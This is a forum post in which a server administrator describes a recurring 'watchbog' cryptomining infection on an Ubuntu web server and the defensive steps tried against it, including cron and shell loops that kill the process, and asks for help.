Hello!


There is a new virus out there which creates a proccess called "WATCHBOG" and eats all CPU from the server, after further investigation, i found out that this virus is mining cryptocurrency.

Full story:

Server specs:
OS: Ubuntu server 16.04.5 LTS
Software: Apache2 with virtualhosts, MYSQL, PHP5.6, PHP7

When i found out that this web-server is infected, web pages still worked but awfully slow.
So the first thing i see is watchbog process which eats all CPU, so i tried to kill it but it reapears instantly, and everything is so slow that it is almost impossible to operate the server.
Next what i thought- "ok i need to terminate this process" So i thought i will put "* * * * * killall watchbog" in crontab , so i opened crontab,
and found out that its compromised as well, so i removed this new entry from crontab, i deleted the watchbog file, and after a minute or two everything magically reappeared.
Crontab got compromised again to run some kind of remote script and the watchbog process was up and eating cpu again.

I tried to find anything usefull on the web, and found these articles:

Heres is the most helpfull one:
https://sudhakarbellamkonda.blogspot...50061219193777

After following this article the watchbog virus still reappeared
So i came up with this solution:
open a screen session as root and then run this loop: ( while true ; do killall watchbog ; done )
and leave it running in background by detaching screen session with CTRL+A+D.
I posted as well this solution in that blog.
and here is one other post, but nothing really is helpful there
https://unix.stackexchange.com/quest...i-cant-get-rid

So i tried fighting this virus many ways, changed passwords, reinstalled SSH, e.t.c. and no luck
Meanwhile i created a new Ubuntu server with the latest 18.04.1 LTS
We installed all latest webserver stuff, enabled UFW, opened web and ftp ports.
then migrated WWW data and SQL, changed IP back to original servers IP, and..... there it is AGAIN
The virus came back on the new machine
so i think probably this virus infects the system by using some vulnerability in web-server software, but really, i dont know, and i cant find out, and im not the only one trying.

Please HELP !

P.S.
This is my first post, judge me softly please